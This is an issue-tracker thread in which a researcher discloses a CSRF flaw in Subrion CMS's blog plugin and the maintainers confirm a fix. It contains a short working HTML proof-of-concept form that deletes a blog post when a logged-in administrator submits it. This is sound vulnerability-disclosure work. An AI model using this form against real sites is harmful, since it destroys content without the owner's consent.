Critical : Remove Blog Post using CSRF attack

[rudSarkar]

Hi subrion security team,

Bug Description

Cross-site request forgery(CSRF), also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.

Steps to reproduce

<html>
  <body>
    <form action="http://localhost/subrion/blog/delete/<post id>/">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. Save this as whatever.html
2. Replace to post number which post you want to delete.
3. now open whatever.html via browser where you logged in with Subrion CMS
4. Click on Submit request button.
5. the post will delete automatically.

Impact

An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

How to fix this vulnerability

Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.

Regards,
Rudra Sarkar
rudrasarkar815@gmail.com

[Haxor-Injector]

yes very critical ;)

[ghost]

Hello @rudSarkar!

Thanks for this report.

Because of inadequate permissions settings in this plugin, this vulnerability could only be exploited in case if currently logged in user is a member of administrators usergroup. Regarding the vulnerability itself, here really was no owner check. Both these issues have been fixed.

The fix has been included into automatic upgrade patch which has been released two days ago. It includes several security fixes as well. It uses the script's built-in critical upgrades feature and automatically applied to all the script installations.

Thanks for your report and efforts again!

[rudSarkar]

Hi @Batry,

Thank you for the fix.